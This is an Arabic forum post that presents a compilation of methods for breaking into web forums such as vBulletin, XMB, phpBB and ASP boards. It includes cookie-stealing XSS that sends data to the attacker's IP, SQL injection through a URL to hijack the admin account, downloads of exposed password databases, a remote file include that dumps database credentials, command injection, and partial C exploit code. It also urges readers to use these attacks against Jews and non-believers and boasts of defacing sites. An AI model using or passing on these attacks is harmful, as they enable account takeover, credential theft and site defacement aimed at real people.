ஹ منتديات شعلة الإسلام ஹ
[b]¦¦§¦¦ô¤ السلام عليكم و رحمة الله و بركاته ¤ô¦¦§¦¦

مرحبا بكل من دخل و زار منتدانا الجديد , الى من يحب التسجيل و الانضمام الى منتديات شعلة الاسلام
الرجاء الضغط على التسجيل ,

و للدخول الى المنتدى بعضويتك الرجاء الضغط على دخول.

@$مع تحيات فريق ادارة منتديات شعلة الاسلام$@



 
بوابة الصفحةالرئيسيةاليوميةس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول
السلام عليكم ورحمة الله وبركاته يا غير مسجل بسم الله الرحمن الرحيم -- إِلاَّ تَنصُرُوهُ فَقَدْ نَصَرَهُ اللَّه -- صدق الله العظيم -- فواجب كل مسلم يؤمن بالله رباً وبمحمد صلى الله عليه وسلم نبياً  نصرة رسول الله صلى الله عليه وسلم كما قال تعالى (لِتُؤْمِنُوا بِاللَّهِ وَرَسُولِهِ وَتُعَزِّرُوهُ وَتُوَقِّرُوهُ ) وتعزيره يكون بنصره وتأييده ، وتوقيره يكون بإجلاله وإكرامه صلى الله عليه وسلم

ايميل الادارة : seraj050@hotmail.com
Share |
احصائيات
هذا المنتدى يتوفر على 176 عُضو.
آخر عُضو مُسجل هو karamfared فمرحباً به.

أعضاؤنا قدموا 435 مساهمة في هذا المنتدى في 381 موضوع
المواضيع الأخيرة
» ثغرات جديده لااختراق الايميل ( برنامج اختراق الايميل الجديد والثغرات الجديده 2010 )
الجمعة يوليو 27, 2012 7:41 pm من طرف احمد الحنين

» برنامج Msn Hacker V 2.1 تحط الايميل يطلع الباسورد
الجمعة يوليو 13, 2012 7:33 am من طرف عمرالطيب

» مجموعه جديده من الصور الطريفه والغريبه‎
الأربعاء أكتوبر 12, 2011 10:42 am من طرف مصباح

» مقطع قصير قد يغير حياتك للأبد!!!!!!!!!!!!!
السبت أكتوبر 08, 2011 6:43 am من طرف سراج

» كلمات ............. أمنيات .............وباب لا يغلق‎
الإثنين سبتمبر 26, 2011 9:53 am من طرف سراج

» نداء هام لكل مسلم
الإثنين سبتمبر 05, 2011 2:35 am من طرف noha mawazini

» فضل العلم في ديننا العظيم
السبت سبتمبر 03, 2011 6:13 am من طرف سراج

» النباتات الطبيعية
الثلاثاء أغسطس 16, 2011 2:14 am من طرف nour1985

» القارئ أحمد جليل تلاوة عطرة مع الدعاء عام 1432
الجمعة أغسطس 12, 2011 2:22 pm من طرف أبوعمرالمكي

برامج المجانية المهمة لجهازك





 

 
 

شاطر | 
 

 جميع طرق إختراق المنتديات لكل الهاكرز بكافة المستويات + ثغرات جديدة

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
سراج
مـــديـــــر العـــا م
مـــديـــــر العـــا م
avatar

الجنس : ذكر
العمر : 30
تاريخ الميلاد 1410هـ : 10/10/1987
تاريخ التسجيل : 01/08/2009
نقاط : 10102

المزاج : عالي
عدد المساهمات : 365
الموقع : http://www.serajy.yoo7.com

مُساهمةموضوع: جميع طرق إختراق المنتديات لكل الهاكرز بكافة المستويات + ثغرات جديدة   السبت يناير 22, 2011 11:58 am


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الحمد لله رب العالمين و أفضل الصلاة و أتم التسليم على سيدنا محمد صلى الله عليه وعلى آله وصحبه أجمعين أما بعد:
السلام عليكم ورحمة الله وبركاته :
هذا الموضوع يحتوي على معلومات كثيرة ومفيدة [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وبجميع مستوياتهم فأرجوا منكم أن لا تستخدموا هذه المعلومات في مضرة المسلمين و إيذاء إخوانكم في الدين
ولكن أرجوا أن تستخدموها ضد اليهود وكفار و الرتدين

أولا سم بالله وابدأ :
بسم الله الرحمن الرحيم


جميع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] اختراق [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


---------
مقدمة :
---------

الموضوع : اختراق الـ vBulletin
المتطلبات : XXXServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط

ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] .


----------
الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
XXXXXXXXXXXXXXX('src="http://my_ip_address/'+XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX+'">';

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb








ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54








20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين



======================================
إختراق منتديات VP
======================================
اختراق [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بس بمنتديات vb

. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي

2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك

3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .

أو العنوان التفصيلي التالي :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

URL = العنوان المستضيف للمنتدى

مثل = - .com

4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .

سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :

عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266

5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا

عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .

(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))

أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية

6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+ WH
ERE+username='ADMIN'').'

العنوان هذا ستقوم بتغيير الكلمات التالية

URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط =
البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )

7. بعد أن تغيير [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX* .

8. ثم ترجع لصفحة المنتدى الرئيسية
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .

بالطيع ستظهر لك الصفحة التعيسة التي تقول :

أنت قمت بكتابة كلمة سر خاطئة

you typed in the wrong password


9. بكل بساطة أضغط على

نسيت كلمة السر
forgot password

والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني

10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى

ملاحظة هذه الطريقة قديمة وأغلب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم

======================================
إختراق منتديات xmb
======================================
تعتبر [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] من نوع xmb من [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..

وصف للثغره::
وقد تم اكتشاف ثغره جديده في هذا النوع من [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر

الأصدار المصاب:::
XMB 1.6 Magic Lantern Final

الشرح والتطبيق:::
جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:

1- عليك بالذهاب الى موقع جوجل عفوا صاحب الموضوع تعب في احضار الروابط هذه
فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد
باستخدام الوضع المتطور للردفقط
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون متل هدا
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
5- راح ينزل عندك ملف والملف عباره عن ملف مثل الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك متل
هذا مثلا::
xmbuser=admin
واباس راح تلقاه قدامه مثل هذا
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط


======================================
إختراق منتديات XXX Wiz Guide
======================================
مثال:عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على
موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور
للردفقط
هذه الطريقة أقدمها [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
المبتدئين لأنها سهلة جدا وما بدا غير تحمل هالملف وتتصفح الباسوورد على
كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن الهاكر بقرائتك لهذه الثغرة
تستطيع أن تخترق منتدى
أغلب [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] مصابة بهذه الثغرة


بسم الله الرحمن الرحيم

الشرح: ثغرة تصيب منتديات XXX Wiz Guide

أولا إذهب إلى google
اكتب
XXX Wiz forum

وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
admin/wwforum.mdb

حمل الملف وادخل عليه عن طريق microsoft office access

بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin

سجل اسمك والباسوورد

الآن أنت في لوحة التحكم
ها ها ها ها
بس ما حدا يخترق [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الوجودة في محرك البحث قوقل التي قمت باختراقها أنا
هذا منتدى قمت باختراقه لاحقا
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
اكتبوا فيه ما تشائون يا أعضاء وزوار منتديا عرب للأبد
وهي منندى ثان
هذا منتدى دينيماركي
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط


ثغرة في معظم منتديات الـ asp

++++++++++++++++++++++++++
سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages
وعليها فقس
طبعا هذه اللغة وللأسف بها [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] قوية جدا وخصوصا في التعامل مع قواعد بياناتها .

بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة
مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها
لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من
ما يكروسوفت الا اذا لم يوجد له بديل ...الخ
وتعتمد قواعد بياناتها على ثلاثة أنواع هي :
sqlserver && sql && M.S Access

واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا
وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك
مباشرة وتصفح [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الباسوردات بسهولة ويسر وبدون تشفير أيضا .

واليكم المثال من أحد [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] التي تتضح جليه بها هذه الثغرة وهي باسم philboard.asp
مثل هذا المنتدى عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك
الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع
المتطور للردفقط
وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث عن -------------- > philboard وانتظر النتائج ....

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
كيف تحمل قاعدة البيانات ؟
اكتب هذا الامتداد
وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم قاعدة البيانات صغير جدا للتطبيق والتسليم بسرعة
وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات
database/philboard.mdb
وتكتبه بعد اسم الموقع والمنتدى مثل
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

ولا بد لكي تقرا قاعدة البيانات ان يكون في جهازك برنامج ما يكروسوفت أكسس
وبعد فتح قاعدة البيانات ستجد بداخلها عدة جداول فيها [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] محتويات قاعدة البيانات
من ضمنها وهو المهم جدول المستخدمين ال users
وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد

الآن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟
لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف العام

philboard_admin.asp وهذا عنوانها
مثال
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه
لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط

ادخل وستجد كل منتدى وبجانبة كلمه delete و edit
احذف كل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وأنشا منتديات [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] واكتب عليها
XXXXXX by xxxxxxxxxx
xxxxxxx يعني اسمك ,,,

من وين ؟

من المربعين الموجودة بالاسفل في لوحة التحكم
اكتب في المستطيل XXXXXX by xxxxxxxxxx
وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع
واضغط add يعني اضافة

ومبرووووووووووووووووووووووووووووووووك ألف مبرووووووووووك اول اختراق لك

والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد

__________________________________________________

تفضلو ثغرة في هاك الرد السريع منتدى PHPBB

عند تركيبك لهاك الرد السريع
سوف تجد هذا الكود


if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}



دقق جيدا بهذا الكود
ثم أنشاء ملف جديد سمه extension.inc

وضع داخلها مثلا
شفرة

include('config'.'.php');
echo "DB Type: $dbms
";
echo "DB Host: $dbhost
";
echo "DB Name: $dbname
";
echo "DB User: $dbuser
";
echo "DB Pass: $dbpasswd
";
exit;
?>



يمكنك وض الخيارات التي تود مشاهدتها من الهاك

الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
أتجه الى هذا العنوان

URL: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على
موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور
للردفقط BB_Forum]/quick_reply.php?phpbb_root_path=http://[Your
Server]/&mode=smiles

بسهولة أستبدل
[phpBB_Forum]
بعنوان المنتدى المستهدف
[Your Server]
بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به

ماذا ترى؟؟؟
معلومات قاعدة البيانات بين ايديك

الحل لهذه الثغرة الخطيرة والتي شردت الكثير من [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] :

ببساطة أفتح الملف quick_reply.php
أبحث عن
if ( $mode == 'smilies' )
أَضف بعدها مباشرة
phpbb_root_path = "./";

وانشاءالله انحلت المشكلة


_________________




ثغره جديده في منتديات الvb
________________________
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله

لكن هذي كانت على النسخة التجريبية Beta

بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون
مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري
تسجيل الدخول لك

طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]




PHP:

--------------------------------------------------------------------------------


From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln


---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.

-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
target="_blank"> target="_blank">http://www.vbulletin.com/

---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------

-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;

-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;

-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-


p;method="post"
name="vbform">





tabindex="2" />
tabindex="3">
accesskey="s" tabindex="4" />
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

checked="checked" />

checked="checked" />
id="cb_disablesmilies" />


//Set Values and Submit
// You
can write your own JS codes
var xss = "">XXXXX(XXXXXXXX.coo
kie)
";
XXXXXXXX.vbform.title.value=xss;
XXXXXXXX.vbform.preview.click();





*You may need login first


Ferruh Mavituna
XXX Application Security
Consultant
Freelance Developer & Designer
rel="nofollow" target="_blank">href="http://ferruh.mavituna.com" rel="nofollow"
target="_blank">http://ferruh.mavituna.com


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


--------------------------------------------------------------------------------

ثغره جميله لاختراق منتيات الفورم
____________________________
طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . .

وامتدادها تكون . . .
admin/wwforum.mdb

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تصبح . . .
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



طريقه البحث عن الثغره . . . .
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتبحث عن
XXX Wiz forum

ويمكنك كتابه
XXX Wiz forum 1
XXX Wiz forum 2.1

__________________________________________________
___________
ثغرة في منتديات vBulletin في ملفcalendar.php
_ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]%20%60;die();echo%22
المتغيرات
1-example.com بإسم الموقع
2- بأي أمر لينكس مثا لأمر الباسوورد pwd



______________________________________________
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaluated. Because of the way PHP initializes variables,
we can inject HTML or JavaXXXXXX into the XXXXXXXX. So by directing a
user to, for example:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%


2Ephp%3Fcook%3D%27%2B
escape%28XXXXXXXX%2EXXXXXXXXXXXX%29%3C%2FXXXXXX%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way
vBulletin parses URLs, the above will not function inside the forum, but
if we put this in an off-site html file:

XXXXXXXX = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3CXXXXXX%3EXXXXXXXX%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


rd%2Ephp%3Fcook%3D%27
%2Bescape%28XXXXXXXX%2EXXXXXXXXXXXX%29%3C%2FXXXXXX%3E"

And then link to it instead, the exploit will work as intended. The user
doesn't even have to be aware of what has transpired, the above link
will proceed first to the memberlist w/XXXXXXXXXXXX stealing code, and
then to [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

With the recorded user id and password hash, we can access the site:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] hash]
-----------------------------------------------------------------------------------

منقول من موقع امركي



___________________________________
ثغرة vbulletin2

gosper is credited with disclosing this to securiteam on 9-24-02 along with a
working exploit and he probably discovered it too. I wrote this because his
exploit didn't URL encode all the characters that needed to be URL encoded
in order for some of the inputted commands to work properly. I added a date
argument which is essential for exploiting the security hole. I also used an
fdopen() and fgets() to make sure all the output was recieved and displayed
correctly, at least I hope it works better . Last thing I built in was HTTP
version 1.1 support so that you can use this against virtual hosts. Yeah... and
you can exploit this with a XXX browser too, its just easier to use this program,
most of the time.

Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
End of Days, sk3tch and all the people in #ozane ([ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] If I
forgot you, well shit.

Compile: gcc vbcal.c -o vbcal
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include

#define url1 "calendar.php?calbirthdays=1&action=getday&day ="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"

void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}

void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
printf("\n\t XXXXNote: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
exit(0);
}


int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10; /* timeout for connection */
int port = 80; /* 80 default for HTTPD */
char *path = "/"; /* url path, default = "/" */
char *host = NULL, *date = NULL;
char sign = '%';
char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480]; /* 20k recv buf */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;

memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));

prog = argv[0];

fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t ---[ [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

if (argc < 5 || argc > 12)
usage(prog);


while ( (c = getopt(argc, argv, "h:d:u:t:v")) != -1 )
{
switch(c)
{
case 'h': /* host */
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u': /* url path */
{
path = optarg;
break;
}
case 'p': /* port */
{
port = atoi(optarg);
break;
}
case 't': /* connect timeout */
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* make sure we got the required stuff */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);

